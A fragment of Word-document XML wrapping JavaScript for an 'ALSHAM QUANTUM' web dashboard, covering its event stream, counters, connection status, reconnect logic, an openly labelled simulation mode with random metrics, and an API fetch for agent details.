      </w:r>
    </w:p>
    <w:p w14:paraId="16089D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eventLog = document.getElementById('event-log');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639A4E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(!eventLog) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31C2C2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17A494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eventLog.innerHTML = '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FEBA4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2E0BF9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events.slice(0, 8).forEach(event =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C7A9A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eventElement = document.createElement('div');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2697D4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eventElement.className = 'event-item';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C93C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eventElement.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="282DDA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class="w-8 h-8 rounded-full flex items-center justify-center mr-3 flex-shrink-0" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0235F7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style="background: ${event.color || '#F4D03F'}20; color: ${event.color || '#F4D03F'};"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B628F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${event.icon || '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>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F225F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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BECF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class="flex-1 min-w-0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="471E56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&lt;div class="font-medium truncate"&gt;${event.message || 'Neural network event'}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E46B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&lt;div class="text-xs opacity-75"&gt;${event.timestamp || new Date().toLocaleTimeString()}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6305AA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&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5847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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34BEB0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eventLog.appendChild(eventElement);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1280B1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6E1C0F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58317BF" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5132C5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addEventToStream(event) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23BFE0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eventLog = document.getElementById('event-log');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="132272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(!eventLog) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8F67C7" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378CF7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eventElement = document.createElement('div');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36003B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eventElement.className = 'event-item';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41FB42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eventElement.style.opacity = '0';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3B09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eventElement.innerHTML = `</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76EFD9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class="w-8 h-8 rounded-full flex items-center justify-center mr-3 flex-shrink-0" </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A810C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style="background: ${event.color || '#F4D03F'}20; color: ${event.color || '#F4D03F'};"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB29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${event.icon || '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>'}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CF83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68FA32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class="flex-1 min-w-0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61677F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class="font-medium truncate"&gt;${event.message || 'Neural network event'}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A8F28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class="text-xs opacity-75"&gt;${event.timestamp || new Date().toLocaleTimeString()}&lt;/div&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4123A5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0F9BD4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`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684292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5D06C5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eventLog.insertBefore(eventElement, eventLog.firstChild);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C8F4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234A2F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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701FD7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eventElement.style.opacity = '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10A973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eventElement.style.transform = 'translateX(0)';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC01E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}, 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E00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36CE9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while (eventLog.children.length &gt; 8) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045500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eventLog.removeChild(eventLog.lastChild);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C031A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E236F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0890A4C" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="445CD8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showMicroUpdate(message) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E9BC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popup = document.getElementById('micro-update');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F06D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(popup) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179F4D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popup.innerHTML = `&lt;i class="fas fa-atom mr-2"&gt;&lt;/i&gt;${message}`;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557FC3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popup.classList.add('show');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2175D8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40EDE6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setTimeout(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D7D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popup.classList.remove('show');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11D8AF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 3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E1B2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D8A90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7C69693" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="588B65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animateQuantumCounter(elementId, targetValue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C314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element = document.getElementById(elementId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EFD9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(!element) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7072D8EA" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00F88D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currentValue = parseInt(element.textContent.replace(/,/g, '')) || 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A4D07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582312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(targetValue &gt; currentValue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5488BF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(typeof countUp !== 'undefined' &amp;&amp; countUp.CountUp) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D3570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countUpInstance = new countUp.CountUp(elementId, targetValue, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262BC7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startVal: currentValue,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="788A05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duration: 2,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A9D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separator: ',',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3E2F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decimal: '.',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B150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useEasing: true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156E6E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useGrouping: true</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488B57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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24A67C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countUpInstance.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2201C9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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398BFB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element.textContent = targetValue.toLocaleString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2A11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4AF088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08BF98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9463C2D" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="567F49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updateProgressRing(elementId, percentage) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4264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circle = document.getElementById(elementId);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1676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(circle) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADDB9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circumference = 2 * Math.PI * 40; // r=40</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0722DF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offset = circumference - (Math.min(Math.max(percentage, 0), 1) * circumference);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD60D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circle.style.strokeDashoffset = offset;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BFFB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D11CC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ECEB964" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BAAE5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updateConnectionStatus(connected, message = '') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663543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dot = document.getElementById('connection-dot');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24606B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text = document.getElementById('connection-text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2209C5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6BF066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(dot) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009BAC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dot.classList.toggle('connected', connected);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4041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0F2D45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56D17F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(text) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1506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text.textContent = message || (connected ? 'Neural network active' : 'Neural network offline');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4797DA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7A83B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C005785" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="342A93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attemptReconnect() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="606314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(this.reconnectAttempts &lt; this.maxReconnectAttempts) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="540AA6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this.reconnectAttempts++;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AAB1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this.updateConnectionStatus(false, `Reconnecting to neural network... (${this.reconnectAttempts}/${this.maxReconnectAttempts})`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A69ED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console.log(`</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔄</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Neural reconnection attempt ${this.reconnectAttempts}/${this.maxReconnectAttempts}`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CB6DC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4E3A60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setTimeout(() =&gt; this.connect(), this.reconnectDelay * this.reconnectAttempts);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C7D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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B96A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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🚫</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Maximum neural reconnection attempts reached. Starting simulation mode.');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C34E0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this.updateConnectionStatus(false, 'Offline - Simulation active');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="339516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this.startSimulation();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797F51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458F2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34D8EDE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="516E9A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startSimulation() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3ABD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(this.isSimulating) return;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377896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282B0D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this.isSimulating = true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A60F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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎭</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Starting ALSHAM QUANTUM simulation mode...');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA7E7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73778A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let cycles = 200;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BF874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let corePerf = 0.78;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="158FF5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let learnPerf = 0.85;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EC3F8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let guardUptime = 99.9;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F2AB8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34E32C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this.updateDashboard({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A38A8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cycle_counter: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAFAA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total_cycles: cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0036FE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uptime: { days: 3, hours: 12, minutes: 45 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58C261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cycles_per_second: 0.145</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="341926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43F6F1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agents: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A3EC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core: { performance: corePerf, automl_cycles: cycles, last_technique: 'Quantum ML' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AED7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learn: { performance: learnPerf, accuracy: 96.2, last_model: 'Quantum Neural' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="388529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guard: { uptime: guardUptime, status: 'SECURE', last_protocol: 'Quantum Shield' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="679F10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5C35AF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system: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A484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performance: (corePerf + learnPerf) * 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7E4F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memory_usage: 68,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24AB44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cpu_usage: 45,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="597BEE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network_status: 'SIMULATED'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0274BA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53299A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recent_events: [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E16D1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{ icon: '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>', message: 'ALSHAM QUANTUM simulation mode activated', color: '#F4D03F', timestamp: new Date().toLocaleTimeString() }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C81FD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]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31ED7C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7ED15CCE" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="40E254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this.simulationInterval = setInterval(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D57F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cycles += Math.floor(Math.random() * 4) + 1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A95AB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corePerf = Math.min(0.96, corePerf + (Math.random() - 0.5) * 0.02);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AE506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learnPerf = Math.min(0.98, learnPerf + (Math.random() - 0.5) * 0.015);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F3C97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guardUptime = Math.max(99.0, Math.min(100, guardUptime + (Math.random() - 0.5) * 0.1));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628510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25DCD2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this.updateDashboard({</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2393A1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cycle_counter: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A8F8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total_cycles: cycles,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5C0B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uptime: { days: 3, hours: 12, minutes: Math.floor(Date.now() / 60000) % 60 },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3826DD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cycles_per_second: 0.12 + Math.random() * 0.08</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4603AB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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D1B5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agents: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29308B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core: { performance: corePerf, automl_cycles: cycles, last_technique: 'Quantum ML' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4672A2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learn: { performance: learnPerf, accuracy: 95 + Math.random() * 3, last_model: 'Quantum Neural' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E26C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guard: { uptime: guardUptime, status: 'SECURE', last_protocol: 'Quantum Shield' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276EAF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},</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3DD5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system: {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4196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performance: (corePerf + learnPerf) * 50,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3EA1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memory_usage: 65 + Math.random() * 15,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33D5C4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cpu_usage: 40 + Math.random() * 20,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE8FB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network_status: 'SIMULATED'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3CF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1263C1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});</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FFEB8F" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FFC7D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(Math.random() &lt; 0.4) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246A6C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events = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C523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{ icon: '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>', message: `Quantum Cycle #${cycles} processed successfully`, color: '#F4D03F' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F3FE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{ icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', message: 'Learning Engine: Neural optimization completed', color: '#9333EA' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05650A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{ icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🔧</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', message: 'Core Intelligence: Performance enhancement applied', color: '#FF6B6B' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1056F7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{ icon: '</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🛡️</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>', message: 'Security Matrix: Enterprise protection verified', color: '#00F5FF' },</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73609D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{ icon: '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>', message: 'Business Intelligence: Market analysis updated', color: '#2ECC71' }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C74AE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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="034E64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717E27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randomEvent = events[Math.floor(Math.random() * events.length)];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC10C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randomEvent.timestamp = new Date().toLocaleTimeString();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF9CF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this.addEventToStream(randomEvent);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399894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2D7544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}, 3500 + Math.random() * 2000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06E47E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6D866A8" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36E6F6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stopSimulation() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559214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(this.simulationInterval) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6034E1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clearInterval(this.simulationInterval);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A99A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this.simulationInterval = null;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708F08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this.isSimulating = false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A34B8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console.log('</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>🎭</w:t>
      </w:r>
      <w:r w:rsidRPr="006D02FF">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Simulation mode deactivated');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1389C3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72B5C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58AB609" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="75765A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===== REAL DATA INTEGRATION FOR MODALS =====</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586E41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async fetchAgentDetails(agentName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18C7F4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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A0379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response = await fetch(`/api/agent/${agentName}/details`);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025B00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(response.ok) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="781F8B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realData = await response.json();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D435E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return this.generateRealMetrics(agentName, realData);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7B8E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 else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0F3D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throw new Error('API not available');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A7BE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0834B3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catch (error) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68C3F2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console.log('Using fallback data for agent modal');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40446A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return this.getFallbackData(agentName);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC4AC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631C78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63E706A" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="346B76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generateRealMetrics(agentName, apiData) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B512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(agentName === 'core') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="528668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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096A1D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'Current Performance': `${(apiData.basic_metrics?.performance * 100).toFixed(2)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F3AB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'Cycles Executed': apiData.basic_metrics?.automl_cycles || '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFEB0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'Trials Completed': apiData.total_training_samples || '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C582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'Processing Time': `${apiData.avg_processing_time?.toFixed(1)}s` || '0.0s',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3122BF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'Memory Usage': `${apiData.system_resources?.avg_memory?.toFixed(1)}%` || '0%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D09E0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'CPU Usage': `${apiData.system_resources?.avg_cpu?.toFixed(1)}%` || '0%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF64D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'Success Rate': `${((apiData.basic_metrics?.improvement || 0) * 100).toFixed(1)}%`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A1131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3098DD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else if (agentName === 'learn') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736305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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38CFD6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'Performance': `${(apiData.basic_metrics?.performance * 100).toFixed(2)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="186DA9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'Accuracy': `${apiData.basic_metrics?.accuracy?.toFixed(1)}%` || '94.7%',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421671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'Training Cycles': apiData.basic_metrics?.training_cycles || '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="721CC9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'Samples Processed': apiData.total_training_samples || '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="557820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'Epochs Completed': apiData.avg_epochs?.toFixed(0) || '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C9362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'Model Type': apiData.basic_metrics?.last_model || 'Quantum Neural',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D323E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'Convergence Time': `${(apiData.avg_processing_time || 0).toFixed(1)}s`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E69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31700C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else if (agentName === 'guard') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="328C81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return {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="534C5A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'System Uptime': `${(apiData.basic_metrics?.uptime || 99.9).toFixed(2)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334542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'Security Status': apiData.basic_metrics?.status || 'SECURE',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="031F4B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'Checks Performed': apiData.basic_metrics?.checks || '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A1F4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'Threats Detected': apiData.total_threats_scanned || '0',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A2901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'Response Time': `${(apiData.avg_response_time || 0.1).toFixed(2)}s`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12355C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'Security Score': `${(apiData.avg_security_score || 98).toFixed(1)}%`,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="241BF9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'Protocol': apiData.basic_metrics?.last_protocol || 'Quantum Shield'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604A7C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24A168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5F408A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{};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A1B99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FD2EDBD" w14:textId="77777777" w:rsidR="006D02FF" w:rsidRPr="006D02FF" w:rsidRDefault="006D02FF" w:rsidP="006D02FF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79F73C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getFallbackData(agentName) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC7E1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Use data from WebSocket if available</w:t>
      </w:r>
    </w:p>
